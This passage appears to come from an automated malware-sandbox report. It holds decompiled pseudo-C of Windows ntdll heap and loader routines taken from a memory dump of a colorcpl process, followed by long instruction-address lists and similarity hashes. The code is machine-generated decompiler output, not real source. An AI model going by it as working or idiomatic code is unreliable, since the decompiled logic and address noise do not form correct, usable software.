				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x6f0d360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E06E3B8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E06E5B640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x6f08748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E06E1B150();
						} else {
							E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E06E1B150();
						__eflags =  *0x6f07bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E06ED2073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x6f08a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x6f0b1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E06E59730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E06EDA80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E06E59660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E06ED138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E06ECFA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E06EDA80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E06EDA80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E06E37D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E06ED1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E06E37D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E06ED1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E06E3B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E06E3BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E06EDA80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                                                0x06e3b486
                                                                                                0x06e3b48a
                                                                                                0x06e3b48e
                                                                                                0x06e3b491
                                                                                                0x06e3b493
                                                                                                0x06e3b49a
                                                                                                0x06e3b49c
                                                                                                0x06e3b4a2
                                                                                                0x06e3b4a7
                                                                                                0x06e3b6fc
                                                                                                0x06e3b6fc
                                                                                                0x06e3b6b3
                                                                                                0x06e3b6c3
                                                                                                0x06e3b6c3
                                                                                                0x06e3b4b4
                                                                                                0x06e8294f
                                                                                                0x06e82951
                                                                                                0x06e82957
                                                                                                0x06e8295d
                                                                                                0x06e82961
                                                                                                0x06e82980
                                                                                                0x06e82985
                                                                                                0x06e82963
                                                                                                0x06e82978
                                                                                                0x06e8297d
                                                                                                0x06e8298b
                                                                                                0x06e82990
                                                                                                0x06e82995
                                                                                                0x06e8299d
                                                                                                0x06e829a1
                                                                                                0x06e829a2
                                                                                                0x06e829a2
                                                                                                0x06e829a7
                                                                                                0x06e829a7
                                                                                                0x06e82951
                                                                                                0x06e3b4ba
                                                                                                0x06e3b4ba
                                                                                                0x06e3b4bd
                                                                                                0x06e3b4c2
                                                                                                0x06e3b6d4
                                                                                                0x06e3b4c8
                                                                                                0x06e3b4c8
                                                                                                0x06e3b4c8
                                                                                                0x06e3b4cd
                                                                                                0x06e3b4d0
                                                                                                0x06e3b4d9
                                                                                                0x06e3b4df
                                                                                                0x06e3b4e2
                                                                                                0x06e829b7
                                                                                                0x06e829bd
                                                                                                0x00000000
                                                                                                0x06e3b4e8
                                                                                                0x06e3b4e8
                                                                                                0x06e3b4ef
                                                                                                0x06e3b4fa
                                                                                                0x06e3b703
                                                                                                0x06e3b709
                                                                                                0x06e3b70b
                                                                                                0x06e3b711
                                                                                                0x06e3b711
                                                                                                0x06e3b70b
                                                                                                0x06e3b503
                                                                                                0x06e3b50c
                                                                                                0x06e3b511
                                                                                                0x06e3b514
                                                                                                0x06e3b519
                                                                                                0x06e829c5
                                                                                                0x06e829c7
                                                                                                0x06e829cc
                                                                                                0x06e829cd
                                                                                                0x06e829cf
                                                                                                0x06e829d0
                                                                                                0x06e829d2
                                                                                                0x06e829d7
                                                                                                0x06e829d9
                                                                                                0x06e829ee
                                                                                                0x06e829ee
                                                                                                0x06e829f4
                                                                                                0x06e829fa
                                                                                                0x06e82a01
                                                                                                0x00000000
                                                                                                0x06e82a01
                                                                                                0x06e829db
                                                                                                0x06e829df
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e829e1
                                                                                                0x06e829e4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e829e6
                                                                                                0x06e829e6
                                                                                                0x06e3b51f
                                                                                                0x06e3b51f
                                                                                                0x06e3b520
                                                                                                0x06e3b525
                                                                                                0x06e3b52b
                                                                                                0x06e3b52d
                                                                                                0x06e3b52e
                                                                                                0x06e3b530
                                                                                                0x06e3b535
                                                                                                0x06e3b53b
                                                                                                0x06e3b53d
                                                                                                0x06e82a07
                                                                                                0x00000000
                                                                                                0x06e82a07
                                                                                                0x06e3b549
                                                                                                0x06e3b54e
                                                                                                0x06e82a12
                                                                                                0x06e82a15
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82a24
                                                                                                0x06e3b559
                                                                                                0x06e3b55c
                                                                                                0x06e82a34
                                                                                                0x06e82a3b
                                                                                                0x06e82a4d
                                                                                                0x06e82a4d
                                                                                                0x06e82a3b
                                                                                                0x06e3b566
                                                                                                0x06e3b56b
                                                                                                0x06e3b56f
                                                                                                0x06e3b57b
                                                                                                0x06e3b582
                                                                                                0x06e82a57
                                                                                                0x06e82a5c
                                                                                                0x06e82a5c
                                                                                                0x06e3b582
                                                                                                0x06e3b58b
                                                                                                0x06e3b58e
                                                                                                0x06e3b592
                                                                                                0x06e3b596
                                                                                                0x06e3b599
                                                                                                0x06e3b59b
                                                                                                0x06e3b59e
                                                                                                0x06e3b5a3
                                                                                                0x06e3b5a6
                                                                                                0x06e3b5a9
                                                                                                0x06e82a66
                                                                                                0x06e82a67
                                                                                                0x06e82a73
                                                                                                0x06e82a78
                                                                                                0x06e3b5b8
                                                                                                0x06e3b5b8
                                                                                                0x06e3b5bb
                                                                                                0x06e3b5bd
                                                                                                0x06e3b5bd
                                                                                                0x06e3b5c4
                                                                                                0x06e3b5f7
                                                                                                0x06e3b5f7
                                                                                                0x06e3b600
                                                                                                0x06e3b606
                                                                                                0x06e3b60c
                                                                                                0x06e3b612
                                                                                                0x06e3b618
                                                                                                0x06e3b621
                                                                                                0x06e3b623
                                                                                                0x06e3b629
                                                                                                0x06e3b629
                                                                                                0x06e3b62c
                                                                                                0x06e3b62f
                                                                                                0x06e3b633
                                                                                                0x06e3b636
                                                                                                0x06e3b639
                                                                                                0x06e3b71d
                                                                                                0x06e3b720
                                                                                                0x06e3b736
                                                                                                0x06e3b660
                                                                                                0x06e3b660
                                                                                                0x06e3b662
                                                                                                0x06e3b665
                                                                                                0x06e3b66a
                                                                                                0x06e3b6e6
                                                                                                0x06e3b6e7
                                                                                                0x06e3b6ea
                                                                                                0x06e3b6ef
                                                                                                0x06e82ad1
                                                                                                0x06e82ad2
                                                                                                0x06e82ad8
                                                                                                0x06e82add
                                                                                                0x06e82add
                                                                                                0x06e3b6f5
                                                                                                0x06e3b6f5
                                                                                                0x06e3b672
                                                                                                0x06e3b675
                                                                                                0x06e3b67a
                                                                                                0x06e82ae5
                                                                                                0x06e82ae8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82af4
                                                                                                0x06e82afc
                                                                                                0x00000000
                                                                                                0x06e3b680
                                                                                                0x06e3b680
                                                                                                0x06e3b680
                                                                                                0x06e3b685
                                                                                                0x06e3b687
                                                                                                0x06e3b68a
                                                                                                0x06e82b06
                                                                                                0x06e82b0c
                                                                                                0x06e82b13
                                                                                                0x06e82b1e
                                                                                                0x06e82b20
                                                                                                0x06e82b2b
                                                                                                0x06e82b2b
                                                                                                0x06e82b2b
                                                                                                0x06e82b34
                                                                                                0x06e82b45
                                                                                                0x06e82b45
                                                                                                0x06e82b13
                                                                                                0x06e3b696
                                                                                                0x06e3b69b
                                                                                                0x06e3b6a0
                                                                                                0x06e82b4f
                                                                                                0x06e82b52
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82b61
                                                                                                0x00000000
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a8
                                                                                                0x06e3b6ab
                                                                                                0x06e82b70
                                                                                                0x06e82b72
                                                                                                0x06e82b7d
                                                                                                0x06e82b7d
                                                                                                0x06e82b7d
                                                                                                0x06e82b86
                                                                                                0x06e82b97
                                                                                                0x06e82b97
                                                                                                0x06e3b6b1
                                                                                                0x00000000
                                                                                                0x06e3b6b1
                                                                                                0x06e3b6a0
                                                                                                0x06e3b67a
                                                                                                0x06e3b722
                                                                                                0x06e3b722
                                                                                                0x06e3b655
                                                                                                0x06e3b65d
                                                                                                0x00000000
                                                                                                0x06e3b5c6
                                                                                                0x06e3b5c6
                                                                                                0x06e3b5ce
                                                                                                0x06e82a83
                                                                                                0x06e82a97
                                                                                                0x06e82a97
                                                                                                0x06e82a9a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82a88
                                                                                                0x06e82a8a
                                                                                                0x06e82a8c
                                                                                                0x06e82a8f
                                                                                                0x06e82a92
                                                                                                0x06e82aa1
                                                                                                0x06e82aa1
                                                                                                0x06e82aa2
                                                                                                0x06e82aab
                                                                                                0x06e82ab0
                                                                                                0x00000000
                                                                                                0x06e82ab0
                                                                                                0x06e82a94
                                                                                                0x06e82a94
                                                                                                0x00000000
                                                                                                0x06e82a9c
                                                                                                0x06e3b5d4
                                                                                                0x06e3b5d4
                                                                                                0x06e3b5d6
                                                                                                0x06e3b5d9
                                                                                                0x06e3b5de
                                                                                                0x06e3b5e1
                                                                                                0x06e3b5e4
                                                                                                0x06e82ab8
                                                                                                0x06e82ab9
                                                                                                0x06e82ac4
                                                                                                0x06e82ac9
                                                                                                0x06e3b5f2
                                                                                                0x06e3b5f2
                                                                                                0x06e3b5f4
                                                                                                0x06e3b5f4
                                                                                                0x00000000
                                                                                                0x06e3b5e4
                                                                                                0x06e3b5c4
                                                                                                0x06e3b554
                                                                                                0x06e3b554
                                                                                                0x00000000
                                                                                                0x06e3b554

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                • Opcode ID: 4826e2d219deefd62451b84948e17b4979a166199ce84a5d39312cccf5221b6c
                                                                                                • Instruction ID: a6eb6dbb229bcdb7e322711b91bc82b7b0d5e34ada23e13b65c1545658b0836e
                                                                                                • Opcode Fuzzy Hash: 4826e2d219deefd62451b84948e17b4979a166199ce84a5d39312cccf5221b6c
                                                                                                • Instruction Fuzzy Hash: 46E1BE70A10355EFDB98DF68C888BBAB7B5FF44304F1091A9E51A9B391D730EA41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E28794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 83%
                                                                                                			E06E28794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E06E2934A() != 0) {
								_t159 = E06E9A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x6f05780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x6f05780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E06E2849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E06E28999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E06E28999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x6f05c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x6f05c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E06E32280(_t92, 0x6f086cc);
															_t94 = E06EE9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E06E461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x6f05c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E06E28A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x6f05c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x6f05c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E06E5F380(_t136, 0x6df1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E06E32280(_t108, 0x6f086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E06E461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E06EE9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E06E2FFB0(_t118, _t156, 0x6f086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E06E59A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                0x06e28799
                                                                                                0x06e2879d
                                                                                                0x06e287a1
                                                                                                0x06e287a3
                                                                                                0x06e287a8
                                                                                                0x06e287c3
                                                                                                0x06e287c3
                                                                                                0x06e287c8
                                                                                                0x06e287d1
                                                                                                0x06e287d4
                                                                                                0x06e287d8
                                                                                                0x06e287e5
                                                                                                0x06e287ec
                                                                                                0x06e79bfe
                                                                                                0x06e79c00
                                                                                                0x06e79c02
                                                                                                0x06e79c08
                                                                                                0x06e79c0d
                                                                                                0x06e79c0f
                                                                                                0x06e79c14
                                                                                                0x06e79c2d
                                                                                                0x06e79c32
                                                                                                0x06e79c37
                                                                                                0x06e79c3a
                                                                                                0x06e79c3c
                                                                                                0x06e79c42
                                                                                                0x06e79c42
                                                                                                0x06e79c3c
                                                                                                0x06e79c02
                                                                                                0x06e287da
                                                                                                0x06e287df
                                                                                                0x06e287e3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e287e3
                                                                                                0x06e287f2
                                                                                                0x00000000
                                                                                                0x06e287fb
                                                                                                0x06e287fd
                                                                                                0x06e287fe
                                                                                                0x06e2880e
                                                                                                0x06e2880f
                                                                                                0x06e28810
                                                                                                0x06e28814
                                                                                                0x06e2881a
                                                                                                0x06e2881c
                                                                                                0x06e2881f
                                                                                                0x06e28821
                                                                                                0x06e28822
                                                                                                0x06e28824
                                                                                                0x06e28826
                                                                                                0x06e2882c
                                                                                                0x06e2882e
                                                                                                0x06e79c48
                                                                                                0x06e79c48
                                                                                                0x06e28834
                                                                                                0x06e28834
                                                                                                0x06e28837
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e28837
                                                                                                0x06e2882e
                                                                                                0x06e2883d
                                                                                                0x06e28840
                                                                                                0x06e28843
                                                                                                0x06e28846
                                                                                                0x06e28849
                                                                                                0x06e2884c
                                                                                                0x06e2884e
                                                                                                0x06e28850
                                                                                                0x06e28852
                                                                                                0x06e28854
                                                                                                0x06e28857
                                                                                                0x06e288b4
                                                                                                0x06e288b6
                                                                                                0x06e288b6
                                                                                                0x06e28859
                                                                                                0x06e28859
                                                                                                0x06e28859
                                                                                                0x06e28861
                                                                                                0x06e28866
                                                                                                0x06e2886a
                                                                                                0x06e2893d
                                                                                                0x06e28941
                                                                                                0x00000000
                                                                                                0x06e28947
                                                                                                0x06e28947
                                                                                                0x06e2894a
                                                                                                0x06e2894c
                                                                                                0x00000000
                                                                                                0x06e28952
                                                                                                0x06e28955
                                                                                                0x06e2895a
                                                                                                0x06e2895d
                                                                                                0x06e2895d
                                                                                                0x06e2895f
                                                                                                0x06e28961
                                                                                                0x06e28961
                                                                                                0x06e28968
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2896a
                                                                                                0x06e2896b
                                                                                                0x06e2896e
                                                                                                0x00000000
                                                                                                0x06e28970
